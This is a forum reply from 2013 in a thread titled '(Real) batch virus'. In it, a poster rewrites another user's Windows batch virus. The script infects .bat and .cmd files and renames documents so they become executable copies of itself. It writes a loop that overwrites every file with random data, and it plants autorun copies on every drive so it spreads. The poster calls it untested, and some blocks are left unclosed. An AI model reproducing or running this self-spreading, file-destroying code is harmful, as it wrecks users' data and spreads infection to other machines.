RE: (Real) batch virus. 03-19-2013, 07:05 AM
Untested, but just trying to duplicate what you had...:
You also have duplicate lines in here, lots of unnecessary code for no reason. Some lines served no purpose.
@echo off
for %%G in (bat cmd) do (
for /f "tokens=*" %%H in ('dir *.%%G /b /s') do type %0 >> %%H
for %%G in (txt rtf doc docx php ref css inf ini odt mak) do (
for /f "tokens=*" %%H in ('dir *.%%G /b /s') do move %%H %%H.bat & type %0 >> %%H.bat
if exist virus.bat (
set a=malware.bat
) else (
set a=virus.bat
echo :loop > %a%
echo for /f "tokens=*" %%%%a in ('dir *.* /b /s') do echo ^%rando^m%%r^andom%%ra^ndom%%rando^m%%r^andom% ^>^> %%%%a >> %a% & echo %ra^ndom%x^=^^^=S?S%r^andom% ^>^> %%%%f >> %a%
echo goto loop >> %a%
start %a%
for %%G in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
if not exist %%G:\autorun.bat copy %0 %%G:\autorun.bat
echo [autorun] > %%G:\autorun.inf
echo open=autorun.bat >> %%G:\autorun.inf
goto loop
You also have duplicate lines in here, lots of unnecessary code for no reason. Some lines served no purpose.
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Getting Started: C/C++ | Common Mistakes
[ Assembly / C++ / .NET / Haskell / J Programmer ]
"Object oriented way to get rich? Inheritance"
Getting Started: C/C++ | Common Mistakes
[ Assembly / C++ / .NET / Haskell / J Programmer ]